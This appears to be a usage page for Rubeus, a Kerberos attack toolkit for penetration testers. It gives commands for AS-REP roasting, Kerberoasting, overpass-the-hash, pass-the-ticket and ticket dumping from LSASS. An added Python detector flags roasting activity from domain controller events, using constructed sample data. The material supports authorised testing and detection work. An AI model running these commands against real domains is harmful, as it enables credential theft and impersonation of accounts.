Rubeus

Kerberos interaction and abuse toolkit

Overview

Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project and the broader Kerberos research community. Rubeus acts as a Swiss Army knife for dealing with Kerberos tickets (TGTs and TGSs), allowing red teamers and penetration testers to request, extract, forge, and pass Kerberos tickets without directly invoking mimikatz.

Key Features

  • Overpass-the-Hash and Pass-the-Ticket (PTT) capabilities.
  • AS-REP Roasting and Kerberoasting.
  • Ticket extraction from LSASS (without requiring mimikatz).
  • Ticket renewal and harvesting (Ticket monitoring).
  • Forced delegation abuses (S4U2Self / S4U2Proxy).

Usage Examples

AS-REP Roasting

Fetch AS-REP hashes for accounts that have DONT_REQ_PREAUTH set, i.e. accounts that do not require Kerberos pre-authentication.

BASH
# Automatically discover and roast vulnerable accounts in the domain
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt

# Target a specific user
Rubeus.exe asreproast /user:victim_user /domain:target.local /format:hashcat

Kerberoasting

Request service tickets for accounts configured with SPNs so that they can be cracked offline.

BASH
# Identify and request tickets for all vulnerable SPNs
Rubeus.exe kerberoast /outfile:kerb_hashes.txt

# Target a specific SPN and request an RC4-encrypted ticket (/rc4opsec)
Rubeus.exe kerberoast /spn:cifs/srv-fs01.target.local /rc4opsec /outfile:kerb_hashes.txt
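
Both AS-REP Roasting and Kerberoasting leave traces in the domain controller Security log (events 4768 and 4769). The following detection sketch is an added example, not part of Rubeus or the original page; the sample events are constructed, and the window and threshold values are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                 # etype 23 (RC4-HMAC)
WINDOW = timedelta(minutes=5)   # assumption: tune per environment
MIN_SERVICES = 3                # assumption: distinct services per client in WINDOW

def ev(eid, time, user, ip, etype, service="krbtgt", preauth=None):
    """Build one constructed event using 4768/4769 field names."""
    e = {"EventID": eid, "TimeCreated": "2024-05-01T" + time, "TargetUserName": user,
         "IpAddress": ip, "TicketEncryptionType": etype, "ServiceName": service}
    if preauth is not None:
        e["PreAuthType"] = preauth
    return e

# Constructed sample events, not taken from a real log.
EVENTS = [
    ev(4768, "09:00:00", "alice", "::ffff:10.0.0.21", "0x12", preauth="2"),
    ev(4768, "09:00:05", "svc_legacy", "::ffff:10.0.0.50", "0x17", preauth="0"),
    ev(4769, "09:00:30", "alice@CORP.EXAMPLE", "::ffff:10.0.0.21", "0x12", "FS01$"),
    ev(4769, "09:01:00", "bob@CORP.EXAMPLE", "::ffff:10.0.0.50", "0x17", "svc_sql"),
    ev(4769, "09:01:10", "bob@CORP.EXAMPLE", "::ffff:10.0.0.50", "0x17", "svc_web"),
    ev(4769, "09:01:20", "bob@CORP.EXAMPLE", "::ffff:10.0.0.50", "0x17", "svc_backup"),
    ev(4769, "09:02:00", "carol@CORP.EXAMPLE", "::ffff:10.0.0.33", "0x17", "svc_sql"),
]

def detect(events, window=WINDOW, min_services=MIN_SERVICES):
    """Return (kind, account, source) alerts in event-time order."""
    alerts, flagged = [], set()
    rc4 = defaultdict(list)   # (account, source) -> [(time, service)] inside window
    for e in sorted(events, key=lambda x: x["TimeCreated"]):
        ts = datetime.fromisoformat(e["TimeCreated"])
        src = (e["TargetUserName"], e["IpAddress"])
        if e["EventID"] == 4768 and e.get("PreAuthType") == "0":
            # TGT issued without pre-authentication (DONT_REQ_PREAUTH account).
            alerts.append(("asrep", *src))
        elif e["EventID"] == 4769 and int(e["TicketEncryptionType"], 16) == RC4_HMAC:
            svc = e["ServiceName"]
            if svc.endswith("$") or svc.lower() == "krbtgt":
                continue      # machine accounts and krbtgt are noise for this rule
            rc4[src] = [(t, s) for t, s in rc4[src] if ts - t <= window] + [(ts, svc)]
            if len({s for _, s in rc4[src]}) >= min_services and src not in flagged:
                flagged.add(src)
                alerts.append(("kerberoast", *src))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

A single RC4 service ticket request (carol in the sample) is not flagged on its own; the rule keys on one client requesting RC4 tickets for several distinct user-account services in a short window.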

Overpass-the-Hash

Request a Kerberos Ticket Granting Ticket (TGT) using an NTLM hash or AES key, rather than a plaintext password.

BASH
# Request TGT using an RC4/NTLM hash and inject it into the current session
Rubeus.exe asktgt /user:Administrator /rc4:NTLM_HASH_HERE /ptt

# Request TGT using an AES256 key
Rubeus.exe asktgt /user:Administrator /aes256:AES256_KEY_HERE /ptt

Pass-the-Ticket (PTT)

Pass an existing .kirbi or Base64-encoded ticket into the current logon session.

BASH
# Pass a base64 encoded ticket
Rubeus.exe ptt /ticket:BASE64_BLOB

# Pass a ticket from a .kirbi file
Rubeus.exe ptt /ticket:C:\Windows\Temp\ticket.kirbi

Ticket Extraction

Extract the tickets currently held by the LSA. Note: this requires high integrity (Administrator/SYSTEM).

BASH
# Dump tickets for logon session 0x3e7 (SYSTEM) as unwrapped base64 for easy copying out of a terminal
Rubeus.exe dump /luid:0x3e7 /nowrap